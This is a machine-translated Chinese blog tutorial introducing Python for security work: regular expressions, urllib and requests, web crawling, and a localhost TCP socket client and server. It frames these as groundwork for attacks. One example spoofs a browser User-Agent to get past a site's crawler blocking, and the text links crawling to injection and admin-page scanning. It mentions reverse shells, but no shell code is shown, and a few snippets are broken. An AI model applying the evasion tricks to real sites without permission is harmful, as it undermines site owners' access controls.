Python Black hat's second article will be shared Python Basic knowledge of network attack and defense , have a look Python What can be done , And regular expressions 、 Introduction to web crawler and socket communication . This paper refers to i spring and autumn ADO Teacher's course content , I really recommend you to study here ichunqiu Curriculum , At the same time, it also explains with the author's experience . I hope this basic article can help you , I hope you can improve your safety awareness , Welcome to discuss .
Na Zhang AI Safety home in 2020 year 8 month 18 Open daily , Will focus on Python And security technology , Mainly share Web penetration 、 System security 、CVE Reappear 、 Threat Intelligence Analysis 、 Artificial intelligence 、 Big data analysis 、 Malicious code detection and other articles . I really want to share what I have learned and done in the past ten years , Make progress with everyone .
Statement : I firmly oppose the use of teaching methods to carry out malicious attacks , All wrong behavior will be severely punished , Green network needs our common maintenance , We also recommend that you understand the principle behind the technology , Better security protection . Although the author is a safe little white , But it will ensure that every article will be carefully written , I hope these basic articles will help you , On the safe road together .
First , You need to understand the seven basic steps of network attack and defense .
The picture below is ATT&CK frame , Include 12 A step .
secondly , Why choose Python As a development tool ?
Really good security engineers make the tools they need ( Including modifying the open source code ), and Python Language is such a sharp tool .Python The development platform includes Seebug、TangScan、BugScan etc. . In terms of breadth ,Python Honeypot deployment is possible 、 Sandbox 、Wifi A middleman 、Scrapy Web crawler 、 Vulnerability writing 、 Common tools, etc ; In depth ,Python Can achieve SQLMAP Such a powerful SQL Injection tool , Realization mitmproxy Man in the middle attacks artifact, etc . because Python Simple 、 Easy to learn 、 Free and open source 、 High-level language 、 portable 、 Scalable 、 Rich third-party library function features ,Python In a few lines of code Java Features that require a lot of code , also Python It's cross platform ,Linux and Windows Can use , It can quickly implement and verify our network attack and defense ideas , So we chose it as our development tool .
that , We can use Python To do what? ?
Last , Readers are advised to prepare for the following .
Here's a simple one Python Example , adopt import Import expansion pack base64, It's going to string base64 Add and decode module , adopt print dir(base64)、help(base64) You can check the related functions .
# -*- coding: utf-8 -*-
import base64
print dir(base64)
print base64.__file__
print base64.b64encode('eastmount')
The output result is shown in the figure below , Includes viewing source file locations and “eastmount” transcoding .
Next we start to learn Python Regular expressions 、Python Web Programming and Python Network programming .
Before using regular expressions , We need a basic understanding of Python Basic knowledge of 、HTTP agreement , Familiar use BurpSuite、SQLMAP Tools .Python Regular expressions are widely used in crawler development 、 Multithreading 、 Network programming , and hacker Applications will also involve knowledge of regular expressions , Like scanning 、 Blast 、POC etc. .
Regular expressions (RegEx) Use a single string to describe it 、 Matches a series of strings that conform to a syntax rule . for example , If you want to get inside ip Address , You need to use regular expressions to implement .Python adopt re The module provides support for regular expressions , The basic steps are as follows :
Take a simple example :
import re
pattern = re.compile('east')
match = pattern.match('eastmount!')
print(match.group())
word = re.findall('east', 'east mount')
print(word)
The output is :
spot (.) Indicates that any newline character is matched “\n” Characters other than .
import re
word = "http://www.eastmount.com Python_9.29"
key = re.findall('t.', word)
print key
The output is :[‘tt’, ‘tm’, ‘t.’, ‘th’], Match in turn t Two characters with any character .
Slash (\) Represents a matching escape character If you need matching points , It has to be \ Escape character .
import re
word = "http://www.eastmount.com Python_9.29"
key = re.findall('\.', word)
print key
The output is :[’.’, ‘.’, ‘.’].
[…] Bracket is the corresponding position and can be any character in the character set .
The characters in the character set can be listed one by one , You can also give the range , Such as [abc] or [a-c], If the first character is ^ Representation inversion , Such as [ ^ abc] It means not abc Other characters of . for example :a[bcd]e Can match to abe、ace、ade.
Matching digital and non digital cases .
# -*- coding: utf-8 -*-
import re
# Match the Numbers
word = "http://www.eastmount.com Python_9.29"
key = re.findall('\d\.\d\d', word)
print key
# Match non numeric
key = re.findall('\D', word)
print key
The output result is shown in the figure below :
Regular expressions are more difficult to understand , More recommended when readers really use to learn to Baidu related rules , You can use it . meanwhile , More use of regular expressions, readers are advised to learn by themselves after coming down , As shown in the table below .
The following rules are more common , These rules may be helpful to our network attack and defense .
1. Get numbers
# -*- coding: utf-8 -*-
import re
string="A1.45,b5,6.45,8.82"
regex = re.compile(r"\d+\.?\d*")
print(regex.findall(string))
The output is :
[‘1.45’, ‘5’, ‘6.45’, ‘8.82’]
2. Grab the content between the tags
# coding=utf-8
import re
import urllib
html = u'<title> Welcome to Python Attack and defense series </title>'
title = re.findall(r'<title>(.*?)</title>', html)
for i in title:
print(i)
The output is :
3. Grab the content between the hyperlink tags
# coding=utf-8
import re
import urllib.request
url = "http://www.baidu.com/"
content = urllib.request.urlopen(url).read()
#print(content)
# Get the full hyperlink
res = r"<a.*?href=.*?<\/a>"
urls = re.findall(res, content.decode('utf-8'))
for u in urls:
print(u)
# Get hyperlinks <a> and </a> Between the content
res = r'<a .*?>(.*?)</a>'
texts = re.findall(res, content.decode('utf-8'), re.S|re.M)
for t in texts:
print(t)
The output results are shown below , Chinese coding is a common problem , We need to pay attention to , such as utf-8 code .
4. Grab the hyperlink tag url
# coding=utf-8
import re
content = '''
<a href="http://news.baidu.com" name="tj_trnews" class="mnav"> Journalism </a>
<a href="http://www.hao123.com" name="tj_trhao123" class="mnav">hao123</a>
<a href="http://map.baidu.com" name="tj_trmap" class="mnav"> Map </a>
<a href="http://v.baidu.com" name="tj_trvideo" class="mnav"> video </a>
'''
res = r"(?<=href=\").+?(?=\")|(?<=href=\').+?(?=\')"
urls = re.findall(res, content, re.I|re.S|re.M)
for url in urls:
print(url)
The output of the obtained hyperlink is shown in the figure below :
5. Capture the image hyperlink tag url And the name of the picture
stay HTML in , We can see all kinds of pictures , The basic format of the picture label is “< img src= Picture address />”, Only by grabbing the original address of these pictures , To download the corresponding picture to local . So how to get the original image address in the image tag ? The following code is to get the image link address method .
content = '''<img alt="Python" src="http://www.yangxiuzhang.com/eastmount.jpg" />'''
urls = re.findall('src="(.*?)"', content, re.I|re.S|re.M)
print(urls)
# ['http://www.yangxiuzhang.com/eastmount.jpg']
The original address of the picture is “http://www.xxx.com/eastmount.jpg”, It corresponds to a picture , The image is stored in “www.xxx.com” Website server side , the last one “/” The following field is the image name , That is to say “eastmount.jpg”. So how to get url What about the last parameter in ?
content = '''<img alt="Python" src="http://www..csdn.net/eastmount.jpg" />'''
urls = 'http://www..csdn.net/eastmount.jpg'
name = urls.split('/')[-1]
print(name)
# eastmount.jpg
More use of regular expressions , Readers should be re - present with the actual situation .
there Web Programming is not about using Python Development Web Program , It's about using Python And Web Interaction , obtain Web Information . The main contents include :
urllib yes Python Used to get URL(Uniform Resource Locators, Unified resource addresser ) Library function , Can be used to grab remote data and save , You can even set the header (header)、 agent 、 Overtime authentication, etc .urllib The upper interface provided by the module allows us to read just like a local file www or ftp The data on the . It is better than C++、C# Other programming languages are more convenient to use . The common methods are as follows :
urlopen(url, data=None, proxies=None)
This method is used to create a remote URL Class file object of , Then operate the class file object like a local file to get remote data . Parameters url Represents the path to remote data , It's usually a web address ; Parameters data Said to post Method submitted to url The data of ; Parameters proxies Used to set up agents .urlopen Returns a class file object .
# -*- coding:utf-8 -*-
import urllib.request
url = "http://www.baidu.com"
content = urllib.request.urlopen(url)
print(content.info()) # Header information
print(content.geturl()) # request url
print(content.getcode()) #http Status code
This section calls urllib.urlopen(url) Function to open Baidu link , And output the message header 、url、http Status codes and other information , As shown in the figure below .
urlretrieve(url, filename=None, reporthook=None, data=None)
urlretrieve The method is to download the remote data locally , Parameters filename Specifies the path to save locally , If this parameter is omitted ,urllib Will automatically generate a temporary file to save the data ; Parameters reporthook Is a callback function , When connecting to the server , The callback is triggered when the corresponding data block is transferred , This callback function is usually used to display the current download progress ; Parameters data Refers to the data passed to the server .
# -*- coding:utf-8 -*-
import urllib.request
url = 'https://www.baidu.com/img/bd_logo.png'
path = 'test.png'
urllib.request.urlretrieve(url, path)
It will Baidu Logo Download pictures to local .
Be careful :Python3 and Python2 There's a little difference in the code ,Python2 Call directly urllib.urlopen().
requests The module is to use Python language-written 、 be based on urllib Third party library , use Apache2 Licensed Open source protocol http library . It is better than urllib It is more convenient , It can save a lot of work , And completely satisfied http Test requirements .requests It's a very practical Python http Client library , When writing crawlers and testing server response data, you often use . I recommend that you start from requests Official website To study , Here is a brief introduction .
Suppose the reader has used “pip install requests” Installed requests modular , The following explains the basic usage of the module .
1. Send network request
r = requests.get("http://www.eastmountyxz.com")
r = requests.post("http://www.eastmountyxz.com")
r = requests.put("http://www.eastmountyxz.com")
r = requests.delete("http://www.eastmountyxz.com")
r = requests.head("http://www.eastmountyxz.com")
r = requests.options("http://www.eastmountyxz.com")
2. by URL Pass parameters
import requests
payload = {
'key1':'value1', 'key2':'value2'}
r = requests.get('http://httpbin.org/get', params=payload)
print(r.url)
The output result is shown in the figure below , The parameters are spliced .
3. Response content
import requests
r = requests.get('http://www.eastmountyxz.com')
print(r.text)
print(r.encoding)
4. Binary response content
r = requests.get('http://www.eastmountyxz.com')
print(r.content)
5. Custom request header
url = 'http://www.ichunqiu.com'
headers = {
'content-type':'application/json'}
r = requests.get(url, headers=headers)
Be careful :headers Can be added to cookies
6. complex POST request
payload = {
'key1':'value1', 'key2':'value2'}
r = requests.post('http://httpbin.org/post', data=payload)
7. Response status code and response header
r = requests.get('http://www.ichunqiu.com')
r.status_code
r.headers
8.Cookies
r.cookies
r.cookies['example_cookie_name']
9. Overtime
requests.get('http://www.ichunqiu.com', timeout=0.001)
10. Errors and exceptions
Network problems ( Such as :DNS The query fails , Reject links, etc ) when ,requests Will throw out a ConnectionError abnormal ; Encounter rare ineffectiveness HTTP When the response type is ,requests Will throw a HTTPError abnormal ; If the request times out , Will throw out a Timeout abnormal .
Web crawlers are also called web spiders , Network robot , Web chaser , It is a program or script that automatically grabs the information of the world wide web according to certain rules . The biggest benefit is batch and automated access to and processing of information , For the macro or micro situation, we can understand it from one side . In the field of security , Crawlers can do directory scanning 、 Search the test page 、 Sample documents 、 Administrator login page, etc . Many companies ( Such as Green League ) Of Web Vulnerability scanning also goes through Python To automatically identify vulnerabilities .
The following two cases are simple , It can solve a lot of people's problems , I hope readers can complete it independently .
1. Set header request ( Flow analysis is related to )
Suppose we need to grab 360 Steve Jobs in Encyclopedia , As shown in the figure below .
Traditional crawler code will be intercepted by websites , So we can't get the relevant information .
# -*- coding: utf-8 -*-
import requests
url = "https://baike.so.com/doc/24386561-25208408.html"
content = requests.get(url, headers=headers)
print(content.text)
Right click the review element ( Press F12), stay Network In order to get Headers value .headers There's a lot in it , The main thing that is often used is user-agent and host, They are shown in the form of bond pairs , If user-agent In the form of dictionary key pairs headers The content of , Then we can reverse climb .
The code is as follows :
# -*- coding: utf-8 -*-
import requests
# Add request header
url = "https://baike.so.com/doc/24386561-25208408.html"
headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'
}
content = requests.get(url, headers=headers)
content.encoding='utf-8'
print(content.text)
The output result is shown in the figure below :
Some websites will return Json Formatted data , We can go through json Module processing . The core code is as follows :
data = json.loads(r.text)
print(data['result'])
name_len = len(data['result'])
for i range(name_len):
print(data['result'][i]['courseName'])
2. Submit a data request ( Blind injection is related to )
If some websites involve page turning , Need to get information on all page numbers , The most traditional way is to define a function , And then design a loop , Traverse the content of different pages at a time . The core code is as follows :
url_start = ""
url_end = ""
def lesson(url):
....
for i in range(1,9)
url = url_start+ str(i) + url_end
lesson(url)
But if URL Always the same , We need to analyze in depth , Or through Selenium Simulate browser crawling , Here is a more skillful method .
Suppose we want to crawl the public information of a website , But by flipping, we found that this page url The address is the same , We can roughly judge , The data in the middle table is through js Dynamically loaded , We can capture bags through analysis , Find the real request address . The target website is as follows :
By reviewing elements, you can find that there is one pagesnum Variable , It's marked as our page number , So we need to go through requests Submit variable data , You can turn pages .
The core code is as follows :
# -*- coding: utf-8 -*-
import requests
import time
import datetime
url = "http://www.hshfy.sh.cn/shfy/gweb/ktgg_search_content.jsp?"
page_num = 1
date_time = datetime.date.fromtimestamp(time.time())
print(date_time)
data = {
"pktrqks": date_time,
"ktrqjs": date_time,
"pagesnum": page_num
}
print(data)
content = requests.get(url, data, timeout=3)
content.encoding='gbk'
print(content.text)
Python Network communication is mainly C/S Architecturally , Using socket to realize .C/S Architecture is the client side (Client) And the service side (Server) framework ,Server The only purpose is to wait Client Request ,Client Even on Server Send the necessary data , And then wait Server The end completes the feedback of the request .
C/S Network programming :Server End to set , First create a communication endpoint , Give Way Server The client can listen for requests , Then it goes into waiting and processing Client In an infinite loop of requests .Client Programming is relative to Server End programming is simple , Just create a communication endpoint , Establish a link to the server , You can make a request .
Socket is a kind of socket with “ Communication endpoint ” Concept of computing network data structure , A networked application must create a socket at the beginning of any communication . It's like a telephone socket , No communication without it , This metaphor is very vivid .Python Support :AF_UNIX、AF_NETLINK、AF_INET, among AF_INET It's a network-based socket .
Sockets originate 20 century 70 The's version of Berkeley, California Unix, namely BSD Unix, Also known as “ Berkeley socket ” or “BSD Socket ”. Initially, sockets were designed to communicate between multiple applications on the same host , This is called interprocess communication or IPC.
There are two kinds of sockets : File based and web based
If you compare a socket to a phone view —— That is, the bottom structure of communication , The host and port are a pair of area codes and phone numbers . An Internet address consists of hosts and ports necessary for network communication . And there must be someone on the other end of the line , Otherwise, it will prompt “ I'm sorry , The number you dialed is empty , Please check and dial again ”. Similarly, you may encounter such as “ Unable to connect to the server 、 The server is not responding ” etc. . The legal port range is 0~65535, Less than 1024 The port number is reserved for the system .
1. Connection oriented TCP
Make sure to establish a connection before communicating , This way of communication is also known as “ Virtual circuit ” or “ Stream Socket ”. Connection oriented communication provides sequential 、 Reliably 、 No duplicate data transfer , And it won't be added to the data boundary . It means , Every time you send a message , It may be split into multiple parts , Each one will arrive at its destination correctly , And then put them together again in order , To the waiting application .
The main protocol for this connection is the transmission control protocol TCP. To create a TCP When a socket is created, the socket type must be specified as SOCK_STREAM.TCP The socket type represents its characteristics as a stream socket . Because these sockets use Internet Protocol IP To find hosts in the network , So the whole system formed in this way , Generally, these two agreements (TCP and IP) Combination description , namely TCP/IP.
2. There is no connection UDP
You can communicate without establishing a connection . But this time , The order in which the data arrives 、 Reliability and non repeatability cannot be guaranteed . Datagrams preserve data boundaries , This means that the data is sent all the time , It's not like connection oriented protocols that break up into small pieces . It's the same as postal service , Mail and parcels do not necessarily arrive in the order they were sent , Some may not even reach . And messages in the network may be sent repeatedly . So many shortcomings , Why use it ? Because connection oriented sockets provide some guarantees , Virtual circuit connections need to be maintained , It's all a serious extra burden . Datagrams don't have these burdens , All of it will be more ” cheap “, It usually provides better performance , More suitable for certain occasions , For example, the real-time data required by live broadcast should be fast .
The main protocol to implement this connection is the user datagram protocol UDP. To create a UDP When a socket is created, the socket type must be specified as SOCK_DGRAM. The name comes from datagram( The datagram ), These sockets use internet protocol to find network hosts , The whole system is called UDP/IP.
Use socket Modular socket() Function to create a socket . The grammar is as follows , among socket_family No AF_VNIX Namely AF_INET,socket_type It can be SOCK_STREAM perhaps SOCK_DGRAM,protocol Generally do not fill in , The default value is 0.
Create a TCP/IP The socket syntax is as follows :
Also create a UDP/IP The socket syntax is as follows :
because socket There are too many attributes in the module , So use "from socket import *" sentence , hold socket All the attributes in the module are brought to the namespace , Greatly shorten the code . Call the following :
Here are the most commonly used socket object methods :
Tips : When running web applications , If you can use it to run servers and clients on different computers, it's best , It can help you understand the communication process better , And more localhost or 127.0.0.1.
1. The server tcpSerSock.py
The core operations are as follows :
# -*- coding: utf-8 -*-
from socket import *
from time import ctime
HOST = 'localhost' # Host name
PORT = 21567 # Port number
BUFSIZE = 1024 # Buffer size 1K
ADDR = (HOST,PORT)
tcpSerSock = socket(AF_INET, SOCK_STREAM)
tcpSerSock.bind(ADDR) # Bind address to socket
tcpSerSock.listen(5) # monitor At most at the same time 5 A link in
while True: # Infinite loop waiting for the connection to come
try:
print('Waiting for connection ....')
tcpCliSock, addr = tcpSerSock.accept() # Passively accept client connections
print('Connected client from : ', addr)
while True:
data = tcpCliSock.recv(BUFSIZE) # Receive data
if not data:
break
else:
print('Client: ',data)
info = ('[%s] %s' %(ctime(),data))
info = bytes(info, encoding = "utf8")
tcpCliSock.send(info) # Time stamp
except Exception as e:
print('Error: ',e)
tcpSerSock.close() # Shut down the server
tcpCliSock.close()
2. client tcpCliSock.py
The core operations are as follows :
# -*- coding: utf-8 -*-
from socket import *
HOST = 'localhost' # Host name
PORT = 21567 # Port number Consistent with the server
BUFSIZE = 1024 # Buffer size 1K
ADDR = (HOST,PORT)
tcpCliSock = socket(AF_INET, SOCK_STREAM)
tcpCliSock.connect(ADDR) # Connect to server
while True: # Infinite loop waiting for the connection to come
try:
data = input('>')
data = bytes(data, encoding = "utf8")
print(data,type(data))
if not data:
break
tcpCliSock.send(data) # send data
data = tcpCliSock.recv(BUFSIZE) # Receive data
if not data:
break
print('Server: ', data)
except Exception as e:
print('Error',e)
tcpCliSock.close() # Close client
Because the server is passively looping around waiting for a connection , So you need to run the server first , Open the client again . And because of my Python There will always be no response , So using cmd Run the server Server Program ,Python IDLE Run the client to communicate . The results are shown in the following figure :
Another way to turn on at the same time Python3.6 and Python3.7 communicate , As shown in the figure below .
It is recommended to create threads to handle client requests ,SocketServer A module is based on socket Module's high-level socket communication module , Support new threads or processes to handle client requests . At the same time, it is recommended to exit and call the server close() Function try-except sentence .
that , How to bounce back shell The procedure ?
Use from subprocess import Popen, PIPE Import library , Call the system command to realize . The core code is as follows , follow-up Windows The loophole reappearance after thorough explanation , You'll better understand this part of the code .
I hope this article can help you , This is a Python Black hat's second blog , The follow-up author will also continue to study in depth , Make some common gadgets for your communication . Last , Thank you for your attention “ Na Zhang's home ” official account , I hope my article can accompany you to grow up , Hope to keep moving forward on the road of technology . If the article is helpful to you 、 Have an insight , It's the best reward for me , Let's see and cherish ! Thank you again for your attention , Please help to promote it “ Na Zhang's home ”, ha-ha ~ Newly arrived , Please give me more advice .
above :
Three foot podium , Three inch pen , Three thousand peaches and plums .
a wide-ranging project over many years , Ten year wind , One hundred thousand pillars .
I wish all teachers a happy holiday , It's also my fifth teacher's day . From our goddess 2011 I went to a mountain village to help teach , Come to me 2014 He took up the platform of supporting education in 1949 , Until then 2016 I really became a university teacher , Thank you for coming along , Happy holidays to the goddess and me , Thank you for your blessing and help .
Whether or not to continue to be a teacher in the future , Xiuzhang will always remember the beauty of being a teacher , Remember the charm of sharing knowledge , Remember that you have a big smile on your face , I will also share better articles online , I really hope to help more people , Share what you have learned these years . Remain true to our original aspiration , Move forward with gratitude . It's fantastic , She was not a teacher from a normal school , Program ape is teaching , ha-ha !
(By: Na Zhang AI Safe house Eastmount 2020-09-11 Night in Wuhan )
reference :